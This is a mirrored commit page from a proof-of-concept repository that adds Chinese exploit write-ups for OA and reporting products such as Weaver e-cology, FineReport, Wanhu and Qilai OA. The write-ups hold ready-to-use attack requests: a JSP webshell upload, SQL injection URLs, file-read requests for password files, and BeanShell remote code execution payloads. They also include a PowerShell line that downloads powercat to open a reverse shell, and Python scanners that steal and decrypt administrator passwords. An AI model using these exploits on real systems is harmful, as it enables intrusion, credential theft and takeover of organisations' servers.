admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

OA产品漏洞

Browse Source
This commit is contained in:
Threekiii 2022-02-21 09:35:01 +08:00
parent e9e1a4597a
commit 8b4e8ec87c
45 changed files with 4527 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

50
OA产品漏洞/万户OA fileUpload.controller 任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,50 @@
# 万户OA fileUpload.controller 任意文件上传漏洞
## 漏洞描述
万户OA fileUpload.controller 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件
## 漏洞影响
```
万户OA
```
## FOFA
```
app="万户网络-ezOFFICE"
```
## 漏洞复现
产品页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628348571931-52bde954-fcd0-485f-bc17-1494f5eb53f4.png)
发送请求包上传文件
```php
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 773
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*......tas9er*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628348700247-9ac78c6c-b56f-4137-a0b3-ba3b13733c19.png)
使用冰蝎连接木马 **/defaultroot/upload/html/xxxxxxxxxx.jsp**
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628349045223-89889c4f-c7e6-4a31-af77-5c58fa8749b4.png)

46
OA产品漏洞/华天动力OA 8000版 workFlowService SQL注入漏洞.md Normal file
View File

@ -0,0 +1,46 @@
# 华天动力OA 8000版 workFlowService SQL注入漏洞
## 漏洞描述
华天动力OA 8000版 workFlowService接口存在SQL注入漏洞攻击者通过漏洞可获取数据库敏感信息
## 漏洞影响
```
华天动力OA 8000版
```
## FOFA
```
app="华天动力-OA8000"
```
## 漏洞复现
产品页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628496676017-abce1043-e1a9-4142-9481-555f1bf0821c.png)
发送请求包验证漏洞
```php
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: 、
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: http://www.baidu.com
Cache-Control: max-age=0
<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
</buffalo-call>
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628496737082-cede14dc-71ae-4ec3-83da-e0707e4f8f4f.png)

33
OA产品漏洞/启莱OA CloseMsg.aspx SQL注入漏洞.md Normal file
View File

@ -0,0 +1,33 @@
# 启莱OA CloseMsg.aspx SQL注入漏洞
## 漏洞描述
启莱OA CloseMsg.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## FOFA
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
存在SQL注入的文件为 CloseMsg.aspx
```plain
http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1
```
![qilai-3-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-3-1.png)
使用SQLmap对参数 user 进行注入
![qilai-3-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-3-2.png)

35
OA产品漏洞/启莱OA messageurl.aspx SQL注入漏洞.md Normal file
View File

@ -0,0 +1,35 @@
# 启莱OA messageurl.aspx SQL注入漏洞
## 漏洞描述
启莱OA messageurl.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## FOFA
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
![qilai-2-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-1.png)
存在SQL注入的文件为 messageurl.aspx
```plain
http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
```
![qilai-2-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-2.png)
使用SQLmap对参数 user 进行注入
![qilai-2-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-3.png)

38
OA产品漏洞/启莱OA treelist.aspx SQL注入漏洞.md Normal file
View File

@ -0,0 +1,38 @@
# 启莱OA treelist.aspx SQL注入漏洞
## 漏洞描述
启莱OA treelist.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## FOFA
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
![qilai-1-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-1.png)
存在SQL注入的文件为 treelist.aspx
```plain
http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1
```
![qilai-1-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-2.png)
使用SQLmap对参数 user 进行注入
![qilai-1-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-3.png)

28
OA产品漏洞/帆软报表 2012 SSRF漏洞.md Normal file
View File

@ -0,0 +1,28 @@
# 帆软报表 2012 SSRF漏洞
## 漏洞描述
帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取造成SSRF
## 漏洞影响
```
帆软报表 2012
```
## FOFA
```
body="down.download?FM_SYS_ID"
```
## 漏洞复现
漏洞验证Url为
```plain
/ReportServer?op=resource&resource=0m0m6k.dnslog.cn
```
![image-20220209113126929](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091131035.png)

47
OA产品漏洞/帆软报表 2012 信息泄露漏洞.md Normal file
View File

@ -0,0 +1,47 @@
# 帆软报表 2012 信息泄露漏洞
## 漏洞描述
帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取部分敏感信息
## 漏洞影响
```
帆软报表 2012
```
## FOFA
```
body="down.download?FM_SYS_ID"
```
## 漏洞复现
获取登录报表系统的IP
```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
```
![image-20220209113026424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130468.png)
数据库信息泄露
```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
```
![image-20220209113041021](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130098.png)
后台默认口令 admin/123456
```plain
/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()
```

255
OA产品漏洞/帆软报表 V8 任意文件读取漏洞 CNVD-2018-04757.md Normal file
View File

@ -0,0 +1,255 @@
# 帆软报表 V8 任意文件读取漏洞 CNVD-2018-04757
## 漏洞描述
FineReport报表软件是一款纯Java编写的集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。
FineReport v8.0版本存在任意文件读取漏洞,攻击者可利用漏洞读取网站任意文件。
## 漏洞影响
```
FineReport < v8.0
```
## FOFA
```
body="isSupportForgetPwd"
```
## 漏洞复现
出现漏洞的文件为 fr-applet-8.0.jar
```java
package com.fr.chart.web;
import com.fr.base.FRContext;
import com.fr.general.IOUtils;
import com.fr.stable.CodeUtils;
import com.fr.web.core.ActionNoSessionCMD;
import com.fr.web.utils.WebUtils;
import java.io.InputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class ChartGetFileContentAction extends ActionNoSessionCMD {
public ChartGetFileContentAction() {
}
public void actionCMD(HttpServletRequest var1, HttpServletResponse var2, String var3) throws Exception {
String var4 = CodeUtils.cjkDecode(WebUtils.getHTTPRequestParameter(var1, "resourcepath"));
if (!WebUtils.invalidResourcePath(var4)) {
InputStream var5 = FRContext.getCurrentEnv().readResource(var4);
String var6 = IOUtils.inputStream2String(var5);
var6 = var6.replace('\ufeff', ' ');
WebUtils.printAsString(var2, var6);
}
}
public String getCMD() {
return "get_geo_json";
}
}
```
使用request将文件名传入 调用cjkDecode函数解密文件名
使用invalidResourcePath函数校验文件是否存在
最后使用readResource函数读取文件传输到浏览器上 默认目录为resources
其中的privilege.xml里面存储了后台的用户名密码
```xml
<?xml version="1.0" encoding="UTF-8"?>
<PrivilegeManager xmlVersion="20170715" releaseVersion="8.0.0" fsSystemManagerPassSet="true" birthday="0" male="false">
<rootManagerName>
<![CDATA[admin]]></rootManagerName>
<rootManagerPassword>
<![CDATA[___00520017004e002b004100b7004200250023007f003d003d005400e4001c0057]]></rootManagerPassword>
<AP class="com.fr.privilege.providers.NoAuthenticationProvider"/>
<ForwardUrl>
<![CDATA[${servletURL}?op=fr_platform]]></ForwardUrl>
<PVFILTER class="com.fr.fs.privilege.auth.BasePrivilegeFilter"/>
</PrivilegeManager>
```
- 加密函数
```java
public static String passwordEncode(String var0) {
StringBuilder var1 = new StringBuilder();
var1.append("___");
if (var0 == null) {
return var1.toString();
} else {
int var2 = 0;
for(int var3 = 0; var3 < var0.length(); ++var3) {
if (var2 == PASSWORD_MASK_ARRAY.length) {
var2 = 0;
}
int var4 = var0.charAt(var3) ^ PASSWORD_MASK_ARRAY[var2];
String var5 = Integer.toHexString(var4);
int var6 = var5.length();
for(int var7 = 0; var7 < 4 - var6; ++var7) {
var5 = "0" + var5;
}
var1.append(var5);
++var2;
}
return var1.toString();
}
}
```
- 解密函数
```java
public static String passwordDecode(String var0) {
if (var0 != null && var0.startsWith("___")) {
var0 = var0.substring(3);
StringBuilder var1 = new StringBuilder();
int var2 = 0;
for(int var3 = 0; var3 <= var0.length() - 4; var3 += 4) {
if (var2 == PASSWORD_MASK_ARRAY.length) {
var2 = 0;
}
String var4 = var0.substring(var3, var3 + 4);
int var5 = Integer.parseInt(var4, 16) ^ PASSWORD_MASK_ARRAY[var2];
var1.append((char)var5);
++var2;
}
var0 = var1.toString();
}
return var0;
}
```
使用python写出的解密代码为
```python
cipher = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)
```
这里使用上面讲述的原理进行复现,访问目标
![image-20220209112534997](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127442.png)
路径分为两种
- /WebReport/ReportServer
- ReportServer
访问POC为,读取密码文件 privilege.xml
```plain
/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
```
![image-20220209112600321](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127198.png)
使用解密脚本解密文件
![image-20220209112628783](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127350.png)
得到密码,即可登陆后台系统,账户为 admin
![image-20220209112641890](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127170.png)
## 漏洞POC
```python
import requests
import sys
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 帆软报表 v8.0 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def decode_passwd(cipher):
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] # 掩码
Password = ""
cipher = cipher[3:] # 截断三位后
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
return Password
def POC_1(target_url):
vuln_url_1 = target_url + '/WebReport/ReportServer'
vuln_url_2 = target_url + '/ReportServer'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response_1 = requests.get(url=vuln_url_1, timeout=5, verify=False, headers=headers)
response_2 = requests.get(url=vuln_url_2, timeout=5, verify=False, headers=headers)
if "部署页面" in response_1.text:
print("\033[32m[o] 目标部署页面为: {} \033[0m".format(vuln_url_1))
POC_2(vuln_url_1)
elif "部署页面" in response_2.text:
print("\033[32m[o] 目标部署页面为: {} \033[0m".format(vuln_url_2))
POC_2(vuln_url_2)
else:
print("\033[31m[x] 目标漏洞无法利用 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 目标漏洞无法利用 {} \033[0m".format(e))
sys.exit(0)
def POC_2(vuln_url_fileread):
vuln_url = vuln_url_fileread + "?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, verify=False, timeout=5)
print("\033[32m[o] 正在访问: {} \033[0m".format(vuln_url))
if "rootManagerPassword" in response.text and response.status_code == 200:
print("\033[32m[o] 目标存在漏洞,读取敏感文件 \n{} \033[0m".format(response.text))
user_name = re.findall(r'<!\[CDATA\[(.*?)]]></rootManagerName>', response.text)
cipher = re.findall(r'<!\[CDATA\[(.*?)]]></rootManagerPassword>', response.text)
password = decode_passwd(cipher[0])
print("\033[34m[o] 后台账户密码为:{} {} \033[0m".format(user_name[0], password))
else:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![image-20220209112755243](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127341.png)

33
OA产品漏洞/帆软报表 V9 任意文件覆盖文件上传.md Normal file
View File

@ -0,0 +1,33 @@
# 帆软报表 V9 任意文件覆盖文件上传
## 漏洞描述
帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传
## 漏洞影响
```
帆软 V9
```
## 漏洞复现
![314e84b5-e2ac-4e12-9942-653a8b2445a4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091128879.png)
```plain
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: 192.168.10.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8
Content-Length: 74
{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}
```

31
OA产品漏洞/新点OA ExcelExport 敏感信息泄露漏洞.md Normal file
View File

@ -0,0 +1,31 @@
# 新点OA ExcelExport 敏感信息泄露漏洞
## 漏洞描述
新点OA 存在敏感信息泄露漏洞访问特定的Url时可以获取所有用户的登录名信息攻击者获取后可以进一步利用
## 漏洞影响
```
新点OA
```
## FOFA
```
app="新点OA"
```
## 漏洞复现
构造的Url为
```plain
/ExcelExport/人员列表.xls
```
将会下载人员列表文件
![xindian](https://typora-1308934770.cos.ap-beijing.myqcloud.com/xindian.png)
通过获取的登录名登陆后台(默认密码11111)

74
OA产品漏洞/泛微OA DBconfigReader.jsp 数据库配置信息泄漏漏洞.md Normal file
View File

@ -0,0 +1,74 @@
# 泛微OA DBconfigReader.jsp 数据库配置信息泄漏漏洞
## 漏洞描述
2019年10月24日360CERT监测到友商发布了泛微e-cology OA数据库配置信息泄漏漏洞预警漏洞等级中。
攻击者可通过存在漏洞的页面直接获取到数据库配置信息。如果攻击者可直接访问数据库,则可直接获取用户数据,甚至可以直接控制数据库服务器。
360CERT判断漏洞等级为中危害面/影响面低。建议使用泛微e-cology OA的用户及时安装最新补丁以免遭受黑客攻击。
## 影响版本
```
目前已知为8.100.0531,不排除其他版本包括不限于EC7.0、EC8.0、EC9.0版
```
## 漏洞复现
根据源码可以得到DES密钥为 1z2x3c4v5b6n也有1z2x3c4v的,可以按此规律来爆破)
![image-20220209103714654](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091037951.png)
可以看到会将当前连接数据库的用户名密码urllogintype等信息进行des加密并最终进行返回可以直接通过des解密获取泄露信息。
## 漏洞POC
[Github链接](https://github.com/ianxtianxt/ecologyExp.jar)
python代码
```python
import base64
import requests
import ast
def req(url):
headers = {
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
r1 = requests.get(url,headers=headers).content
s = r1.replace('\r\n','')
res1 = base64.b64encode(s)
postdata = {
'data':res1,
'type':'des',
'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'
}
u = 'http://tool.chacuo.net/cryptdes'
r2 = requests.post(u,data=postdata,headers=headers).content
res2 = ast.literal_eval(r2)
return res2['data']
url = 'http://xxx.xxx.xxx.xxx:8888//mobile/DBconfigReader.jsp'
print req(url)
```
## 参考文章
[[更新\]泛微e-cology OA数据库配置信息泄漏漏洞预警](https://mp.weixin.qq.com/s/zTEUan_BtDDzuHzmd9pxYg)

182
OA产品漏洞/泛微OA E-Bridge saveYZJFile 任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,182 @@
# 泛微OA E-Bridge saveYZJFile 任意文件读取漏洞
## 漏洞描述
泛微云桥e-Bridge是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
## 影响版本
```
泛微云桥 e-Bridge 2018-2019 多个版本
```
## FOFA
```
title="泛微云桥e-Bridge"
```
## 漏洞复现
分为两种,分别为 Windows 和 Linux
### Windows
访问 [**http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt**](http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt)
![image-20220209104944042](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091049126.png)
成功返回 **id值**,说明含有此漏洞
调用查看文件接口访问 **http://xxx.xxx.xxx.xxx/file/fileNoLogin/id值**
![image-20220209104956250](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091049307.png)
### Linux
访问 [**http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt**](http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt)
![image-20220209105016727](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091050824.png)
成功返回 **id值**,说明含有此漏洞
调用查看文件接口访问 **http://xxx.xxx.xxx.xxx/file/fileNoLogin/id值**
![image-20220209105027907](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091050974.png)
## 漏洞POC
注意读取Linux系统文件时需要完整路径
例如读取根目录下的 1.txt
应为 /1.txt 而不是 1.txt
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import base64
import requests
import random
import re
import json
import sys
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 泛微云桥 e-Bridge \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
# 判断操作系统 or 判断漏洞是否可利用
def POC_1(target_url):
vuln_url_1 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt"
vuln_url_2 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
vuln_url_3 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response_1 = requests.get(url=vuln_url_1, headers=headers, verify=False, timeout=10)
response_2 = requests.get(url=vuln_url_2, headers=headers, verify=False, timeout=10)
response_3 = requests.get(url=vuln_url_3, headers=headers, verify=False, timeout=10)
if "无法验证您的身份" in response_1.text and "无法验证您的身份" in response_2.text:
print("\033[31m[x] 漏洞已修复,不存在漏洞 \033[0m")
sys.exit(0)
else:
if "No such file or directory" in response_1.text:
print("\033[32m[o] 目标为 Linux 系统\033[0m")
id = re.findall(r'"id":"(.*?)"', response_3.text)[0]
print("\033[32m[o] 成功获取id{}\033[0m".format(id))
return id,"linux"
elif "系统找不到指定的路径" in response_2.text:
print("\033[32m[o] 目标为 Windows 系统\033[0m")
id = re.findall(r'"id":"(.*?)"', response_1.text)[0]
print("\033[32m[o] 成功获取id{}\033[0m".format(id))
return id,"windows"
else:
print("\033[31m[x] 无法获取目标系统\033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
# 验证漏洞
def POC_2(target_url, id):
file_url = target_url + "/file/fileNoLogin/{}".format(id)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
response.encoding = 'GBK'
print("\033[32m[o] 成功读取:\n\033[0m{}".format(response.text))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
# windows 文件读取
def POC_3(target_url, File):
file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/{}&fileExt=txt".format(File)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
id = re.findall(r'"id":"(.*?)"', response.text)[0]
print("\033[32m[o] 成功获取id{}\033[0m".format(id))
POC_2(target_url, id)
except :
print("\033[31m[x] 请求失败,无法读取文件 \033[0m)")
# linux读取文件
def POC_4(target_url, File):
file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://{}&fileExt=txt".format(File)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
id = re.findall(r'"id":"(.*?)"', response.text)[0]
print("\033[32m[o] 成功获取id{}\033[0m".format(id))
POC_2(target_url, id)
except:
print("\033[31m[x] 请求失败,无法读取文件 \033[0m)")
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
id,system = POC_1(target_url)
POC_2(target_url, id)
while True:
if system == "windows":
File = input("\033[35mFile >>> \033[0m")
if File == "exit":
sys.exit(0)
else:
POC_3(target_url, File)
if system == "linux":
File = input("\033[35mFile >>> \033[0m")
if File == "exit":
sys.exit(0)
else:
POC_4(target_url, File)
```
![image-20220209105047595](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091050654.png)

122
OA产品漏洞/泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204.md Normal file
View File

@ -0,0 +1,122 @@
# 泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
## 漏洞描述
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重.
## FOFA
```
app=“泛微-协同办公OA”
```
## 影响版本
```
E-cology 7.0
E-cology 8.0
E-cology 8.1
E-cology 9.0
```
## 漏洞复现
直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/如下图在victim上执行了命令“whoami”
![image-20220209104639420](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091046499.png)
请求包为
```shell
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: xxxxxxxx:8088
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
bsh.script=ex\u0065c("cmd /c dir");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
```
**关于绕过**
```shell
eval%00("ex"%2b"ec(\"whoami\")");
ex\u0065c("cmd /c dir");
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd
```
## 漏洞POC
https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204
```python
#/usr/bin/python
#coding:utf-8
#Author:Ja0k
#For Weaver-Ecology-OA_RCE
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import requests,sys
headers = {
'Content-Type': 'text/xml; charset=utf-8',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Cache-Control': 'max-age=0',
'Content-Type': 'application/x-www-form-urlencoded',
'Upgrade-Insecure-Requests': '1',
'Content-Length': '578'
}
proxies= {'http':'http://127.0.0.1:8080'}
def Poc_check(target):
Url_Payload1="/bsh.servlet.BshServlet"
Url_Payload2="/weaver/bsh.servlet.BshServlet"
Url_Payload3="/weaveroa/bsh.servlet.BshServlet"
Url_Payload4="/oa/bsh.servlet.BshServlet"
Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw"""
Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4):
url= target + Url_Payload
for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3):
try:
http_response = requests.post(url,data=Data_payload,headers=headers,verify=False)
#print http_response.status_code
if http_response.status_code == 200:
if ";</script>" not in (http_response.content):
if "Login.jsp" not in (http_response.content):
if "Error" not in (http_response.content):
print "{0} is a E-cologyOA_RCE Vulnerability".format(url)
print "Server Current Username{0}".format(http_response.content)
elif http_response.status_code == 500:
print "{0}500 maybe is Weaver-EcologyOAPlease confirm by yourself ".format(url)
else:
pass
except Exception,Error:
pass
if __name__ == '__main__':
for line in open(sys.argv[1]).readlines():
target=line.strip()
Poc_check(target)
```
```plain
#1.install python Dependencies Library
pip install requests
#2.批量脚本 执行
python Weaver-Ecology-OA_RCE-exp.py
url.txt文件中 是url地址 需要带http协议
```

31
OA产品漏洞/泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞.md Normal file
View File

@ -0,0 +1,31 @@
# 泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞
## 漏洞描述
